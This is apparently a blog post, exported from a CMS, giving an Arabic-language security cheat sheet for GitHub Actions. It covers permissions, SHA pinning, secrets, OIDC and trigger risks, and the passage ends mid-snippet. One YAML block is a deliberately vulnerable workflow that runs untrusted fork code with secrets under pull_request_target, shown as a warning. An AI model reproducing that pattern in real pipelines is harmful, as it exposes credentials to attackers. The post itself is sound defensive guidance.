{"id":798,"date":"2026-03-25T09:39:30","date_gmt":"2026-03-25T08:39:30","guid":{"rendered":"https:\/\/secure-pipelines.com\/uncategorized\/github-actions-security-cheat-sheet\/"},"modified":"2026-03-25T09:39:30","modified_gmt":"2026-03-25T08:39:30","slug":"github-actions-security-cheat-sheet","status":"publish","type":"post","link":"https:\/\/secure-pipelines.com\/ar\/ci-cd-security\/github-actions-security-cheat-sheet\/","title":{"rendered":"\u0648\u0631\u0642\u0629 \u0645\u0631\u062c\u0639\u064a\u0629 \u0644\u0623\u0645\u0627\u0646 GitHub Actions: \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a\u060c \u0627\u0644\u062a\u062b\u0628\u064a\u062a\u060c \u0627\u0644\u0623\u0633\u0631\u0627\u0631\u060c \u0648 OIDC"},"content":{"rendered":"<h2>1. \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u2014 \u0645\u0628\u062f\u0623 \u0627\u0644\u062d\u062f \u0627\u0644\u0623\u062f\u0646\u0649 \u0645\u0646 \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a<\/h2>\n<p>\u0623\u0647\u0645 \u062a\u063a\u064a\u064a\u0631 \u064a\u0645\u0643\u0646\u0643 \u0625\u062c\u0631\u0627\u0624\u0647 \u0639\u0644\u0649 \u0623\u064a \u0633\u064a\u0631 \u0639\u0645\u0644 \u0641\u064a GitHub Actions \u0647\u0648 \u062a\u0642\u064a\u064a\u062f \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a. \u0628\u0634\u0643\u0644 \u0627\u0641\u062a\u0631\u0627\u0636\u064a\u060c \u064a\u0645\u062a\u0644\u0643 <code>GITHUB_TOKEN<\/code> <strong>\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0642\u0631\u0627\u0621\u0629 \u0648\u0643\u062a\u0627\u0628\u0629<\/strong> \u0639\u0644\u0649 \u0645\u0639\u0638\u0645 \u0627\u0644\u0646\u0637\u0627\u0642\u0627\u062a. \u0642\u0645 \u0628\u062a\u063a\u064a\u064a\u0631 \u0630\u0644\u0643 \u0641\u0648\u0631\u0627\u064b.<\/p>\n<h3>\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0641\u0642\u0637 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (\u0627\u0644\u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u0623\u0639\u0644\u0649)<\/h3>\n<p>\u0636\u0639 \u0647\u0630\u0627 \u0641\u064a <strong>\u0623\u0639\u0644\u0649 \u0643\u0644 \u0645\u0644\u0641 \u0633\u064a\u0631 \u0639\u0645\u0644<\/strong> \u0644\u062c\u0639\u0644 \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0641\u0642\u0637 \u0647\u064a \u0627\u0644\u0648\u0636\u0639 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a \u0644\u062c\u0645\u064a\u0639 \u0627\u0644\u0645\u0647\u0627\u0645:<\/p>\n<pre><code class=\"language-yaml\"># .github\/workflows\/ci.yml\nname: CI\non: [push, pull_request]\n\npermissions: read-all\n\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@v4<\/code><\/pre>\n<h3>\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0641\u0627\u0631\u063a\u0629 (\u0628\u062f\u0648\u0646 \u0648\u0635\u0648\u0644)<\/h3>\n<p>\u0644\u0644\u0645\u0647\u0627\u0645 \u0627\u0644\u062a\u064a \u0644\u0627 \u062a\u062a\u0639\u0627\u0645\u0644 \u0623\u0628\u062f\u0627\u064b \u0645\u0639 \u0648\u0627\u062c\u0647\u0627\u062a GitHub APIs \u0623\u0648 \u0627\u0644\u0645\u0633\u062a\u0648\u062f\u0639\u060c \u0642\u0645 \u0628\u0625\u0632\u0627\u0644\u0629 \u062c\u0645\u064a\u0639 \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0628\u0627\u0644\u0643\u0627\u0645\u0644:<\/p>\n<pre><code class=\"language-yaml\">jobs:\n  lint:\n    runs-on: ubuntu-latest\n    permissions: {}\n    steps:\n      - uses: actions\/checkout@v4\n      - run: npm run lint<\/code><\/pre>\n<p><strong>\u0644\u0645\u0627\u0630\u0627 \u064a\u0639\u0645\u0644 \u0647\u0630\u0627:<\/strong> \u064a\u0633\u062a\u062e\u062f\u0645 <code>actions\/checkout<\/code> \u0627\u0644\u0631\u0645\u0632 \u0627\u0644\u0645\u0645\u064a\u0632 \u0644\u0644\u0645\u0633\u062a\u0648\u062f\u0639\u0627\u062a \u0627\u0644\u062e\u0627\u0635\u0629 \u0644\u0643\u0646\u0647 \u064a\u0639\u0648\u062f \u0625\u0644\u0649 \u0627\u0644\u0627\u0633\u062a\u0646\u0633\u0627\u062e \u0627\u0644\u0645\u062c\u0647\u0648\u0644 \u0644\u0644\u0645\u0633\u062a\u0648\u062f\u0639\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629. \u0625\u0630\u0627 \u0643\u0627\u0646 \u0645\u0633\u062a\u0648\u062f\u0639\u0643 \u0639\u0627\u0645\u0627\u064b\u060c \u0641\u0625\u0646 <code>permissions: {}<\/code> \u0622\u0645\u0646 \u0644\u0639\u0645\u0644\u064a\u0629 checkout.<\/p>\n<h3>\u0648\u0635\u0641\u0627\u062a \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0644\u0643\u0644 \u0645\u0647\u0645\u0629<\/h3>\n<p>\u0627\u0645\u0646\u062d \u0641\u0642\u0637 \u0645\u0627 \u062a\u062d\u062a\u0627\u062c\u0647 \u0643\u0644 \u0645\u0647\u0645\u0629:<\/p>\n<pre><code class=\"language-yaml\"># Checkout only (private repo)\njobs:\n  test:\n    permissions:\n      contents: read\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@v4\n\n# Deploy to GitHub Pages\njobs:\n  deploy-pages:\n    permissions:\n      pages: write\n      id-token: write\n    runs-on: ubuntu-latest\n\n# Push to GitHub Container Registry (GHCR)\njobs:\n  push-image:\n    permissions:\n      contents: read\n      packages: write\n    runs-on: ubuntu-latest\n\n# Create a GitHub Release\njobs:\n  release:\n    permissions:\n      contents: write\n    runs-on: ubuntu-latest\n\n# Comment on a Pull Request\njobs:\n  comment:\n    permissions:\n      pull-requests: write\n    runs-on: ubuntu-latest<\/code><\/pre>\n<p><strong>\u0627\u0644\u0642\u0627\u0639\u062f\u0629 \u0627\u0644\u0639\u0627\u0645\u0629:<\/strong> \u0627\u0628\u062f\u0623 \u0628\u0640 <code>permissions: {}<\/code> \u0648\u0623\u0636\u0641 \u0627\u0644\u0646\u0637\u0627\u0642\u0627\u062a \u0648\u0627\u062d\u062f\u0627\u064b \u062a\u0644\u0648 \u0627\u0644\u0622\u062e\u0631 \u062d\u062a\u0649 \u062a\u0646\u062c\u062d \u0627\u0644\u0645\u0647\u0645\u0629. \u0644\u0627 \u062a\u062a\u0631\u0643 \u0623\u0628\u062f\u0627\u064b \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0648\u0627\u0644\u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.<\/p>\n<h2>2. \u062a\u062b\u0628\u064a\u062a \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u2014 \u062a\u0648\u0642\u0641 \u0639\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0648\u0633\u0648\u0645<\/h2>\n<p>\u0627\u0644\u0648\u0633\u0648\u0645 \u0645\u062b\u0644 <code>@v4<\/code> \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631. \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0630\u064a \u064a\u062e\u062a\u0631\u0642 \u0625\u062c\u0631\u0627\u0621\u064b \u0634\u0627\u0626\u0639\u0627\u064b \u0623\u0646 \u064a\u0646\u0642\u0644 \u0627\u0644\u0648\u0633\u0645 \u0625\u0644\u0649 commit \u062e\u0628\u064a\u062b. <strong>\u062b\u0628\u0651\u062a \u0643\u0644 \u0625\u062c\u0631\u0627\u0621 \u062a\u0627\u0628\u0639 \u0644\u0637\u0631\u0641 \u062b\u0627\u0644\u062b \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 SHA \u0627\u0644\u0643\u0627\u0645\u0644.<\/strong><\/p>\n<h3>\u0645\u062b\u0628\u0651\u062a \u0645\u0642\u0627\u0628\u0644 \u063a\u064a\u0631 \u0645\u062b\u0628\u0651\u062a<\/h3>\n<pre><code class=\"language-yaml\"># DANGEROUS \u2014 tag can be moved to any commit\n- uses: actions\/checkout@v4\n\n# SAFE \u2014 immutable commit reference\n- uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1<\/code><\/pre>\n<p>\u0627\u0644\u062a\u0639\u0644\u064a\u0642 \u0641\u064a \u0646\u0647\u0627\u064a\u0629 \u0627\u0644\u0633\u0637\u0631 \u064a\u062d\u0627\u0641\u0638 \u0639\u0644\u0649 \u0633\u0647\u0648\u0644\u0629 \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0628\u064a\u0646\u0645\u0627 \u064a\u0642\u0641\u0644 SHA \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u062f\u0642\u064a\u0642 \u0627\u0644\u0630\u064a \u0642\u0645\u062a \u0628\u0645\u0631\u0627\u062c\u0639\u062a\u0647.<\/p>\n<h3>\u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 SHA \u0644\u0623\u064a \u0625\u062c\u0631\u0627\u0621<\/h3>\n<pre><code class=\"language-bash\"># Get the full SHA for a specific tag\ngit ls-remote --tags https:\/\/github.com\/actions\/checkout.git v4.1.1\n\n# Or use the GitHub API\ngh api repos\/actions\/checkout\/git\/ref\/tags\/v4.1.1 --jq '.object.sha'<\/code><\/pre>\n<h3>\u0623\u062a\u0645\u062a\u0629 \u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 Dependabot<\/h3>\n<p>\u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 SHA \u0644\u0627 \u064a\u0639\u0646\u064a \u0627\u0644\u062a\u0648\u0642\u0641 \u0639\u0646 \u0627\u0644\u062a\u062d\u062f\u064a\u062b. \u062f\u0639 Dependabot \u064a\u0642\u062a\u0631\u062d \u062a\u0631\u0642\u064a\u0627\u062a \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u0627\u062a \u062a\u0644\u0642\u0627\u0626\u064a\u0627\u064b:<\/p>\n<pre><code class=\"language-yaml\"># .github\/dependabot.yml\nversion: 2\nupdates:\n  - package-ecosystem: github-actions\n    directory: \"\/\"\n    schedule:\n      interval: weekly\n    commit-message:\n      prefix: \"ci\"\n    reviewers:\n      - \"your-org\/security-team\"\n    labels:\n      - \"dependencies\"\n      - \"ci\"<\/code><\/pre>\n<p>\u064a\u0641\u0647\u0645 Dependabot \u062a\u062b\u0628\u064a\u062a\u0627\u062a SHA. \u0633\u064a\u0642\u0648\u0645 \u0628\u062a\u062d\u062f\u064a\u062b SHA <em>\u0648<\/em> \u0648\u0633\u0645 \u0627\u0644\u062a\u0639\u0644\u064a\u0642 \u0641\u064a \u0637\u0644\u0628 \u0633\u062d\u0628 \u0648\u0627\u062d\u062f.<\/p>\n<h2>3. \u0625\u062f\u0627\u0631\u0629 \u0627\u0644\u0623\u0633\u0631\u0627\u0631<\/h2>\n<p>\u064a\u0648\u0641\u0631 GitHub \u062b\u0644\u0627\u062b\u0629 \u0646\u0637\u0627\u0642\u0627\u062a \u0644\u0644\u0623\u0633\u0631\u0627\u0631. \u0627\u062e\u062a\u0631 \u0627\u0644\u0646\u0637\u0627\u0642 \u0627\u0644\u0645\u0646\u0627\u0633\u0628 \u0644\u062a\u0642\u0644\u064a\u0644 \u0646\u0637\u0627\u0642 \u0627\u0644\u0636\u0631\u0631.<\/p>\n<h3>\u0645\u0642\u0627\u0631\u0646\u0629 \u0646\u0637\u0627\u0642\u0627\u062a \u0627\u0644\u0623\u0633\u0631\u0627\u0631<\/h3>\n<table>\n<thead>\n<tr>\n<th>\u0627\u0644\u0646\u0637\u0627\u0642<\/th>\n<th>\u0627\u0644\u0631\u0624\u064a\u0629<\/th>\n<th>\u0627\u0644\u0623\u0641\u0636\u0644 \u0644\u0640<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><strong>Repository<\/strong><\/td>\n<td>\u062c\u0645\u064a\u0639 \u0633\u064a\u0631 \u0627\u0644\u0639\u0645\u0644 \u0641\u064a \u0645\u0633\u062a\u0648\u062f\u0639 \u0648\u0627\u062d\u062f<\/td>\n<td>\u0645\u0641\u0627\u062a\u064a\u062d API \u0648\u0627\u0644\u0631\u0645\u0648\u0632 \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0627\u0644\u0645\u0633\u062a\u0648\u062f\u0639<\/td>\n<\/tr>\n<tr>\n<td><strong>Environment<\/strong><\/td>\n<td>\u0627\u0644\u0645\u0647\u0627\u0645 \u0627\u0644\u062a\u064a \u062a\u0633\u062a\u0647\u062f\u0641 \u062a\u0644\u0643 \u0627\u0644\u0628\u064a\u0626\u0629 \u0641\u0642\u0637<\/td>\n<td>\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0639\u062a\u0645\u0627\u062f \u0627\u0644\u0625\u0646\u062a\u0627\u062c\u060c \u0645\u0641\u0627\u062a\u064a\u062d \u0627\u0644\u0646\u0634\u0631<\/td>\n<\/tr>\n<tr>\n<td><strong>Organization<\/strong><\/td>\n<td>\u0645\u0633\u062a\u0648\u062f\u0639\u0627\u062a \u0645\u062e\u062a\u0627\u0631\u0629 \u0639\u0628\u0631 \u0627\u0644\u0645\u0646\u0638\u0645\u0629<\/td>\n<td>\u062d\u0633\u0627\u0628\u0627\u062a \u0627\u0644\u062e\u062f\u0645\u0629 \u0627\u0644\u0645\u0634\u062a\u0631\u0643\u0629\u060c \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0639\u062a\u0645\u0627\u062f \u0627\u0644\u0633\u062c\u0644<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>\u0642\u0648\u0627\u0639\u062f \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0628\u064a\u0626\u0629<\/h3>\n<p>\u062a\u062a\u064a\u062d \u0644\u0643 \u0627\u0644\u0628\u064a\u0626\u0627\u062a \u062a\u0642\u064a\u064a\u062f \u0639\u0645\u0644\u064a\u0627\u062a \u0627\u0644\u0646\u0634\u0631 \u062e\u0644\u0641 \u0627\u0644\u0645\u0648\u0627\u0641\u0642\u0627\u062a \u0648\u0645\u0624\u0642\u062a\u0627\u062a \u0627\u0644\u0627\u0646\u062a\u0638\u0627\u0631 \u0648\u0642\u064a\u0648\u062f \u0627\u0644\u0641\u0631\u0648\u0639:<\/p>\n<pre><code class=\"language-yaml\">jobs:\n  deploy-production:\n    runs-on: ubuntu-latest\n    environment:\n      name: production\n      url: https:\/\/app.example.com\n    permissions:\n      id-token: write\n      contents: read\n    steps:\n      - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1\n      - name: Deploy\n        run: .\/deploy.sh\n        env:\n          DEPLOY_KEY: ${{ secrets.PRODUCTION_DEPLOY_KEY }}<\/code><\/pre>\n<p>\u062b\u0645 \u0642\u0645 \u0628\u062a\u0643\u0648\u064a\u0646 \u0628\u064a\u0626\u0629 <code>production<\/code> \u0641\u064a <strong>Settings \u2192 Environments<\/strong> \u0645\u0639:<\/p>\n<ul>\n<li>\u0645\u0631\u0627\u062c\u0639\u0648\u0646 \u0645\u0637\u0644\u0648\u0628\u0648\u0646 (\u0648\u0627\u062d\u062f \u0639\u0644\u0649 \u0627\u0644\u0623\u0642\u0644)<\/li>\n<li>\u0645\u0624\u0642\u062a \u0627\u0646\u062a\u0638\u0627\u0631 (\u0645\u062b\u0644\u0627\u064b 5 \u062f\u0642\u0627\u0626\u0642)<\/li>\n<li>\u0642\u064a\u0648\u062f \u0641\u0631\u0639 \u0627\u0644\u0646\u0634\u0631: <code>main<\/code> \u0641\u0642\u0637<\/li>\n<\/ul>\n<h3>\u0645\u0646\u0637\u0642\u0629 \u0627\u0644\u062e\u0637\u0631: pull_request \u0645\u0642\u0627\u0628\u0644 pull_request_target<\/h3>\n<p>\u0647\u0630\u0627 \u0623\u062d\u062f \u0623\u062e\u0637\u0631 \u0633\u0648\u0621 \u0627\u0644\u0641\u0647\u0645 \u0641\u064a GitHub Actions:<\/p>\n<table>\n<thead>\n<tr>\n<th>\u0627\u0644\u0645\u0634\u063a\u0651\u0644<\/th>\n<th>\u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0645\u0633\u062d\u0648\u0628<\/th>\n<th>\u0627\u0644\u0623\u0633\u0631\u0627\u0631 \u0645\u062a\u0627\u062d\u0629\u061f<\/th>\n<th>\u0627\u0644\u0645\u062e\u0627\u0637\u0631<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><code>pull_request<\/code><\/td>\n<td>PR merge commit<\/td>\n<td>\u0644\u0627 (\u0644\u0644\u0640 forks)<\/td>\n<td>\u0645\u0646\u062e\u0641\u0636\u0629<\/td>\n<\/tr>\n<tr>\n<td><code>pull_request_target<\/code><\/td>\n<td>\u0627\u0644\u0641\u0631\u0639 \u0627\u0644\u0623\u0633\u0627\u0633\u064a<\/td>\n<td><strong>\u0646\u0639\u0645<\/strong><\/td>\n<td><strong>\u062d\u0631\u062c\u0629 \u0625\u0630\u0627 \u0642\u0645\u062a \u0628\u0633\u062d\u0628 \u0643\u0648\u062f PR<\/strong><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong>\u0644\u0627 \u062a\u0641\u0639\u0644 \u0647\u0630\u0627 \u0623\u0628\u062f\u0627\u064b:<\/strong><\/p>\n<pre><code class=\"language-yaml\"># CRITICAL VULNERABILITY \u2014 secrets exposed to fork PR code\non: pull_request_target\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@v4\n        with:\n          ref: ${{ github.event.pull_request.head.sha }}  # Checks out UNTRUSTED fork code\n      - run: .\/build.sh  # Runs attacker-controlled code WITH secrets<\/code><\/pre>\n<p>\u0625\u0630\u0627 \u0643\u0646\u062a \u0628\u062d\u0627\u062c\u0629 \u0625\u0644\u0649 <code>pull_request_target<\/code>\u060c \u0641\u0644\u0627 \u062a\u0642\u0645 \u0623\u0628\u062f\u0627\u064b \u0628\u0633\u062d\u0628 \u0631\u0623\u0633 PR. \u0627\u0633\u062a\u062e\u062f\u0645\u0647 \u0641\u0642\u0637 \u0644\u0648\u0636\u0639 \u0627\u0644\u062a\u0633\u0645\u064a\u0627\u062a \u0623\u0648 \u0627\u0644\u062a\u0639\u0644\u064a\u0642 \u0639\u0644\u0649 \u0643\u0648\u062f \u0627\u0644\u0641\u0631\u0639 \u0627\u0644\u0623\u0633\u0627\u0633\u064a.<\/p>\n<h2>4. OIDC \/ \u0627\u062a\u062d\u0627\u062f \u0647\u0648\u064a\u0629 \u062d\u0645\u0644 \u0627\u0644\u0639\u0645\u0644<\/h2>\n<p>\u062a\u0648\u0642\u0641 \u0639\u0646 \u062a\u062e\u0632\u064a\u0646 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0639\u062a\u0645\u0627\u062f \u0627\u0644\u0633\u062d\u0627\u0628\u0629 \u0637\u0648\u064a\u0644\u0629 \u0627\u0644\u0623\u062c\u0644 \u0643\u0623\u0633\u0631\u0627\u0631. \u0627\u0633\u062a\u062e\u062f\u0645 OpenID Connect \u0644\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0631\u0645\u0648\u0632 \u0642\u0635\u064a\u0631\u0629 \u0627\u0644\u0623\u062c\u0644 \u0645\u0628\u0627\u0634\u0631\u0629 \u0645\u0646 \u0645\u0632\u0648\u062f \u0627\u0644\u0633\u062d\u0627\u0628\u0629 \u0627\u0644\u062e\u0627\u0635 \u0628\u0643.<\/p>\n<p><strong>\u0643\u062a\u0644\u0629 \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u0637\u0644\u0648\u0628\u0629 \u0644\u062c\u0645\u064a\u0639 \u0633\u064a\u0631 \u0639\u0645\u0644 OIDC:<\/strong><\/p>\n<pre><code class=\"language-yaml\">permissions:\n  id-token: write   # Required to request the OIDC JWT\n  contents: read    # Required for actions\/checkout<\/code><\/pre>\n<h3>AWS \u2014 \u062a\u0643\u0648\u064a\u0646 OIDC<\/h3>\n<pre><code class=\"language-yaml\">- name: Configure AWS Credentials\n  uses: aws-actions\/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502 # v4.0.2\n  with:\n    role-to-assume: arn:aws:iam::123456789012:role\/GitHubActions\n    aws-region: us-east-1<\/code><\/pre>\n<p><strong>\u0642\u0627\u0644\u0628 \u0633\u064a\u0627\u0633\u0629 \u0627\u0644\u062b\u0642\u0629 \u0644\u0640 AWS:<\/strong><\/p>\n<pre><code class=\"language-json\">{\n  \"Version\": \"2012-10-17\",\n  \"Statement\": [\n    {\n      \"Effect\": \"Allow\",\n      \"Principal\": {\n        \"Federated\": \"arn:aws:iam::123456789012:oidc-provider\/token.actions.githubusercontent.com\"\n      },\n      \"Action\": \"sts:AssumeRoleWithWebIdentity\",\n      \"Condition\": {\n        \"StringEquals\": {\n          \"token.actions.githubusercontent.com:aud\": \"sts.amazonaws.com\"\n        },\n        \"StringLike\": {\n          \"token.actions.githubusercontent.com:sub\": \"repo:your-org\/your-repo:ref:refs\/heads\/main\"\n        }\n      }\n    }\n  ]\n}<\/code><\/pre>\n<h3>GCP \u2014 \u0627\u062a\u062d\u0627\u062f \u0647\u0648\u064a\u0629 \u062d\u0645\u0644 \u0627\u0644\u0639\u0645\u0644<\/h3>\n<pre><code class=\"language-yaml\">- name: Authenticate to Google Cloud\n  uses: google-github-actions\/auth@55bd8e7c523b4b80c1b4b5e492ffb613a15f2591 # v2.1.3\n  with:\n    workload_identity_provider: projects\/123456\/locations\/global\/workloadIdentityPools\/github\/providers\/github\n    service_account: github-actions@my-project.iam.gserviceaccount.com<\/code><\/pre>\n<h3>Azure \u2014 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f \u0627\u0644\u0645\u0648\u062d\u062f\u0629<\/h3>\n<pre><code class=\"language-yaml\">- name: Azure Login\n  uses: azure\/login@6c251865b4e6290e7b78be643ea2d005bc51f69a # v2.1.1\n  with:\n    client-id: ${{ secrets.AZURE_CLIENT_ID }}\n    tenant-id: ${{ secrets.AZURE_TENANT_ID }}\n    subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}<\/code><\/pre>\n<p><strong>\u0627\u0644\u0641\u0627\u0626\u062f\u0629 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629:<\/strong> \u0644\u0627 \u062a\u0648\u062c\u062f \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0639\u062a\u0645\u0627\u062f \u062b\u0627\u0628\u062a\u0629 \u0645\u062e\u0632\u0646\u0629 \u0641\u064a \u0623\u064a \u0645\u0643\u0627\u0646. \u062a\u0646\u062a\u0647\u064a \u0635\u0644\u0627\u062d\u064a\u0629 \u0627\u0644\u0631\u0645\u0648\u0632 \u0641\u064a \u062f\u0642\u0627\u0626\u0642. \u062a\u0642\u064a\u062f \u0633\u064a\u0627\u0633\u0629 \u0627\u0644\u062b\u0642\u0629 \u0627\u0644\u0645\u0633\u062a\u0648\u062f\u0639\u0627\u062a \u0648\u0627\u0644\u0641\u0631\u0648\u0639 \u0648\u0627\u0644\u0628\u064a\u0626\u0627\u062a \u0627\u0644\u062a\u064a \u064a\u0645\u0643\u0646\u0647\u0627 \u062a\u0648\u0644\u064a \u0627\u0644\u062f\u0648\u0631.<\/p>\n<h2>5. \u0645\u0634\u063a\u0651\u0644\u0627\u062a \u0633\u064a\u0631 \u0627\u0644\u0639\u0645\u0644 \u2014 \u0627\u0644\u0622\u0645\u0646 \u0645\u0642\u0627\u0628\u0644 \u0627\u0644\u062e\u0637\u064a\u0631<\/h2>\n<p>\u0644\u064a\u0633\u062a \u062c\u0645\u064a\u0639 \u0627\u0644\u0645\u0634\u063a\u0651\u0644\u0627\u062a \u0645\u062a\u0633\u0627\u0648\u064a\u0629. \u0628\u0639\u0636\u0647\u0627 \u064a\u0646\u0641\u0630 \u0643\u0648\u062f\u0627\u064b \u0645\u0646 \u0645\u0635\u0627\u062f\u0631 \u063a\u064a\u0631 \u0645\u0648\u062b\u0648\u0642\u0629 \u0623\u0648 \u064a\u0645\u0646\u062d \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0645\u0631\u062a\u0641\u0639\u0629.<\/p>\n<h3>\u062c\u062f\u0648\u0644 \u0623\u0645\u0627\u0646 \u0627\u0644\u0645\u0634\u063a\u0651\u0644\u0627\u062a<\/h3>\n<table>\n<thead>\n<tr>\n<th>\u0627\u0644\u0645\u0634\u063a\u0651\u0644<\/th>\n<th>\u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u0645\u062e\u0627\u0637\u0631<\/th>\n<th>\u0645\u0644\u0627\u062d\u0638\u0627\u062a<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><code>push<\/code><\/td>\n<td>\u0645\u0646\u062e\u0641\u0636<\/td>\n<td>\u064a\u0634\u063a\u0651\u0644 \u0641\u0642\u0637 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0645\u062f\u0645\u062c \u0645\u0633\u0628\u0642\u0627\u064b<\/td>\n<\/tr>\n<tr>\n<td><code>pull_request<\/code><\/td>\n<td>\u0645\u0646\u062e\u0641\u0636<\/td>\n<td>\u0644\u0627 \u0623\u0633\u0631\u0627\u0631 \u0644\u0644\u0640 forks<\/td>\n<\/tr>\n<tr>\n<td><code>schedule<\/code><\/td>\n<td>\u0645\u0646\u062e\u0641\u0636<\/td>\n<td>\u064a\u0639\u0645\u0644 \u0639\u0644\u0649 \u0627\u0644\u0641\u0631\u0639 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a<\/td>\n<\/tr>\n<tr>\n<td><code>workflow_dispatch<\/code><\/td>\n<td>\u0645\u062a\u0648\u0633\u0637<\/td>\n<td>\u0645\u0634\u063a\u0651\u0644 \u064a\u062f\u0648\u064a \u2014 \u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u0645\u062f\u062e\u0644\u0627\u062a<\/td>\n<\/tr>\n<tr>\n<td><code>pull_request_target<\/code><\/td>\n<td><strong>\u0639\u0627\u0644\u064a<\/strong><\/td>\n<td>\u0627\u0644\u0623\u0633\u0631\u0627\u0631 \u0645\u062a\u0627\u062d\u0629 \u2014 \u0627\u0646\u0638\u0631 \u0627\u0644\u0642\u0633\u0645 3<\/td>\n<\/tr>\n<tr>\n<td><code>issue_comment<\/code><\/td>\n<td><strong>\u0639\u0627\u0644\u064a<\/strong><\/td>\n<td>\u0623\u064a \u0645\u0639\u0644\u0642 \u064a\u0645\u0643\u0646\u0647 \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u2014 \u0642\u064a\u0651\u062f \u0628\u0641\u062d\u0648\u0635\u0627\u062a \u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a<\/td>\n<\/tr>\n<tr>\n<td><code>workflow_run<\/code><\/td>\n<td><strong>\u0639\u0627\u0644\u064a<\/strong><\/td>\n<td>\u064a\u0631\u062b \u0627\u0644\u0633\u064a\u0627\u0642 \u0627\u0644\u0645\u0631\u062a\u0641\u0639 \u0645\u0646 \u0633\u064a\u0631 \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0645\u0634\u063a\u0650\u0651\u0644<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>\u062a\u0635\u0641\u064a\u0629 \u0627\u0644\u0641\u0631\u0648\u0639 \u0648\u0627\u0644\u0645\u0633\u0627\u0631\u0627\u062a<\/h3>\n<p>\u0642\u0644\u0644 \u0627\u0644\u062a\u0634\u063a\u064a\u0644\u0627\u062a \u063a\u064a\u0631 \u0627\u0644\u0636\u0631\u0648\u0631\u064a\u0629 \u0648\u062d\u062f\u0651 \u0645\u0646 \u0627\u0644\u062a\u0639\u0631\u0636:<\/p>\n<pre><code class=\"language-yaml\">on:\n  push:\n    branches:\n      - main\n      - 'releases\/**'\n    paths:\n      - 'src\/**'\n      - 'package.json'\n    paths-ignore:\n      - 'docs\/**'\n      - '*.md'<\/code><\/pre>\n<h3>\u0627\u0644\u062a\u062d\u0643\u0645 \u0641\u064a \u0627\u0644\u062a\u0632\u0627\u0645\u0646<\/h3>\n<p>\u0627\u0645\u0646\u0639 \u0639\u0645\u0644\u064a\u0627\u062a \u0627\u0644\u0646\u0634\u0631 \u0627\u0644\u0645\u062a\u0639\u062f\u062f\u0629 \u0645\u0646 \u0627\u0644\u062a\u0633\u0627\u0628\u0642:<\/p>\n<pre><code class=\"language-yaml\">concurrency:\n  group: deploy-${{ github.ref }}\n  cancel-in-progress: false  # Don't cancel in-flight deploys\n\n# For PR builds where canceling old runs is safe:\nconcurrency:\n  group: ci-${{ github.event.pull_request.number || github.sha }}\n  cancel-in-progress: 